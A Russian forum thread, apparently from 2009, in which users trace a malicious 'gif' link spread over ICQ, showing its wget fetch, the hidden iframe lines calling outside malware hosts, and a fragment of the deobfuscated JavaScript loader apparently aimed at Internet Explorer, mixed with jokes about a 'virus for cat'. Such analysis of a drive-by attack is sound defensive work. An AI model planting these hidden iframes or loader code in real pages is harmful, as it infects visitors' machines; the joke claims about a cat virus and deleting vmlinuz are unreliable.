Что за фигню рассылают по аське?

>Это что, и в gif теперь вендовирусы научились встраивать?

всегда умели

ЗЫ пикча не открывается

Наверное это какая то психологтческая атака рассчитаная на подсознание, картинка должна вызывать например ненависть, злобу, желание кого либо убить...

Да там хостинг медленный, ты потерпи, у меня открывается. А можно пруфлинк про вирусы в gif?

по ссылке - троян

Гениально. Я это тоже понимаю. Кто-нибудь даст инфу про эту уязвимость?

wget http://rockfeels.com/img/live.gif
--2009-02-06 13:43:59-- http://rockfeels.com/img/live.gif
Распознаётся rockfeels.com... 210.48.154.132
Устанавливается соединение с rockfeels.com|210.48.154.132|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: 282 [text/html]
Сохраняется в каталог: `live.gif'.

100%[========================================================================== ==========>] 282 --.-K/s в 0s
2009-02-06 13:44:03 (30,5 MB/s) - `live.gif' сохранён [282/282]

cat live.gif

<img src="2410232.jpg"> <iframe src="http://linenetz.com/stats/ru1.php"; style="display:none"></iframe>

Чудесно, спасибо. А это на уязвимость IE рассчитано?

По-ходу ЛОР-эффект, сцылка не открываецо!

>Гениально. Я это тоже понимаю. Кто-нибудь даст инфу про эту уязвимость?

в быдлоконтакте была такая тема, погугли

Проверил в другом браузере - открывается. Просто медленно.

Помоему это не уязвимость, а просто сайт раскручивают или что-то вроде этого. GIF (c HTML кодом внутри) отдаётся с content-type: text/html и соответствующим образом интерпретируется браузерами. А там уже ссылка на реальную картинку + невидимый фрейм...

<img src="2410232.jpg"> <iframe src="http://linenetz.com/stats/ru1.php"; style="display:none"></iframe>

вот так вот..

Да выше уже показывали. Что это за фигня-то, кому это нужно?

<iframe src="http://directlink2.cn/wait/?t=16"; style="display:none"></iframe>

а по следующей ссылке так

а дальше 404. даже если авторы что-то задумывали, оно не работает :]

Да, это я видел, там вообще цепочка странная.

Чорт! Опять оставили без вируса, сцуки :(

> а дальше 404. даже если авторы что-то задумывали, оно не работает :]

Это лор ссылки криво парсит. Ты кавычку удали в конце.

"Расширение" gif, заголовок text/html. Гениально же!

ух, как там клево.

> а дальше 404. даже если авторы что-то задумывали, оно не работает :]

работает. еще как. дальше - еще интересней.

Похоже на эксплоит, но никак не могу найти, где.

Вытянул я последнее звено цепочки, там какой-то скрипт, при чём в каком-то странном виде, нормально отображается только в MC (сжат, что-ли?). Сейчас будем парсить...

Понял! Он нормально отображается, только если ему передать параметр t=16, иначе - каша. Встроенный браузер MC вроде-бы скрипты не выполняет? ;-) Но скрипт просто огромный!

Люди, я в эксплоитах не разбираюсь, так что подключайтесь! Интересно ведь!

Или это у меня глюки, или там банальнейшая ошибка...

а зачем? под линаксом^W GNU/Linux все равно не пашет

Финальный пункт на цепочке возвращает 404 ;_;

Там сжатый gzip'ом скрипт, размером 14.5 кБ в распакованном виде. Написан просто безбожно, всё одной строкой, ни тебе переносов, ни отступов... У меня уже парсер поломался!

Там gzip-нутый АДСКИЙ жабоскрипт, очевидно лезущий в дырку Ослика. Я в этом не разберусь.

залей куда-нибудь пжлст, а то проходить по цепочке лениво)

а я пока гулять пойду, во Львове +12 ^_^_^_^_^

Хотя выглядит забавно. Куча переменных с фрагментами кода, в переменной A собирается сам эксплойт кажется.

Или это я чего-то не понимаю, или в скрипте банальнейшая ошибка: первые открывающие теги <body><script>, а последние закрывающие </script></html>. У меня тут возникли смутные подозрения, что тело скрипта скопипастил какой-то школьник, не сумев написать нормальной HTML-обвязки.

http://depositfiles.com/files/gcuqpxf4w

на пастбин слабо было?

Мне лениво его переформатировать ;-) Там всё одной строкой, без отступов и переносов.

Вобщем, исходный код обработан какой-то фигней, разбросан по переменным из которых и собирается. Я разобрал его чуть-чуть, там его просто много и лень.

http://pastebin.com/m59760d13

в конце дописать echo и получишь код

>в конце дописать echo и получишь код Лолда. Я идиот.

по ходу это не файл, а директория с индексным файлом внутри

Блин, автор, ты офигел. Оказывается это вирус для линукса! Я вот прошел по ссылке, откачал контент в 2 ифреймах. Сделал cat и у меня в консоле все символы стали непонятные. Потом я перезапустил терминал и там окна без загловока, без крестика. И везде так!!!! Я поискал на яндексе, написано что вирус такой для ката!

ЖЖОШЬ!!! Попробуй сделать cat /boot/vmlinuz и получишь точно такой же эффект ;-)

> Я вот прошел по ссылке, откачал контент в 2 ифреймах.

Ты не Ъ, так тебе и надо.

ЗЫ: вирус для ката это жесть.

> /boot/vmlinuz

Новый вирус для cat'а! Будьте осторожны! Если у вас есть этот файл срочно удалите его!

> Новый вирус для cat'а!

МЫ ВСЕ УМРЁМ!!!

> Если у вас есть этот файл срочно удалите его!

Обнаружил и удалил на всех своих машинах. Он походу по сети расползался.

К нему есть антивирус:

$ reset

>Я разобрал его чуть-чуть, там его просто много и лень.

блин, я прогнал через питон, значение переменной A (которая вычисляется там) равно: http://pastebin.com/m124f0c4c

тут нужно отформатировать еще.

да, в конце RSAKey внушаить

#
if((h.length&1)==0)return h;
#
else return"0"+h}RSAKey.prototype.doPublic=QMR;
#
RSAKey.prototype.setPublic=UIY;
#
RSAKey.prototype.encrypt=QCN;
#
sss="";
#
for(oil=0;
#
oil<53;
#
oil++)sss+=String.fromCharCode(Math.floor(75+Math.sin(oil)*21));
#
rsa=new RSAKey();
#
rsa.setPublic("8cadfbed11fa5db288cce74d903fee29a94030d3ef132e4b2dc375bb1eb60643 f5e3108ac01d6ab5c06caf958e08743e7fc0455be7ab3b0e5a05015acdeec025","10001");
#
res=rsa.encrypt(sss);
#
nextkey=res;

GNU indent, между прочим, башку сносит. но в принципе, там немного надо поправить.